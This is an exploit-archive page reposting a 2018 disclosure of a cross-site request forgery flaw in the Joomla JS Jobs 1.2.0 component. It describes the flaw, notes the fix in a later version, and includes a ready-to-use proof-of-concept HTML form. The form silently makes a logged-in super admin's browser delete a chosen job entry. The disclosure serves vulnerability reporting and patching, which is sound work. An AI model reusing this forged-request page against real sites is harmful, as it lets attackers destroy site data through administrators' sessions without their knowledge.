Joomla JS Jobs 1.2.0 Cross Site Request Forgery

Joomla JS Jobs 1.2.0 Cross Site Request Forgery: Posted Apr 19, 2018; Authored by Sureshbabu Narvaneni; Joomla JS Jobs component version 1.2.0 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | 7567b0061def93cea876d101656abf7f8c7e7f1e0377907414e206e95519fad6; Download | Favorite | View

Joomla JS Jobs 1.2.0 Cross Site Request Forgery

#######################################
# Exploit Title: Joomla! Component Js Jobs - Multiple Cross Site Request Forgery Vulnerabilities
# Google Dork: N/A
# Date: 17-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: https://www.joomsky.com
# Software Link: https://extensions.joomla.org/extension/js-jobs/
# Affected Version: 1.2.0
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : NA
#######################################
 
1. Vendor Description:
 
JS Jobs for any business, industry body or staffing company wishing to
establish a presence on the internet. JS Jobs allows you to run your own,
unique jobs classifieds service where you or employer can advertise their
jobs and job seekers can upload their Resumes.
 
2. Technical Description:
 
The state changing actions in JS Jobs before 1.2.1 not having any random
token validation which results in Cross Site Request Forgery Vulnerability.
 
3. Proof of Concept:
 
Delete Job Entry [Super Admin Access]
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://[URL]/joomla/administrator/index.php"
method="POST">
      <input type="hidden" name="js_sortby" value="0" />
      <input type="hidden" name="companyname" value="" />
      <input type="hidden" name="jobtitle" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="jobcategory" value="" />
      <input type="hidden" name="jobtype" value="" />
      <input type="hidden" name="datefrom" value="" />
      <input type="hidden" name="dateto" value="" />
      <input type="hidden" name="status" value="" />
      <input type="hidden" name="cid[]" value="[Job ID]" />
      <input type="hidden" name="limit" value="20" />
      <input type="hidden" name="limitstart" value="0" />
      <input type="hidden" name="option" value="com_jsjobs" />
      <input type="hidden" name="task" value="job.jobenforcedelete" />
      <input type="hidden" name="c" value="job" />
      <input type="hidden" name="view" value="job" />
      <input type="hidden" name="layout" value="jobs" />
      <input type="hidden" name="callfrom" value="jobs" />
      <input type="hidden" name="boxchecked" value="1" />
      <input type="hidden" name="sortby" value="asc" />
      <input type="hidden" name="my_click" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
4. Solution:
 
Update to latest version
 
https://extensions.joomla.org/extension/js-jobs/

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Joomla JS Jobs 1.2.0 Cross Site Request Forgery

Joomla JS Jobs 1.2.0 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla JS Jobs 1.2.0 Cross Site Request Forgery

Share This

Joomla JS Jobs 1.2.0 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems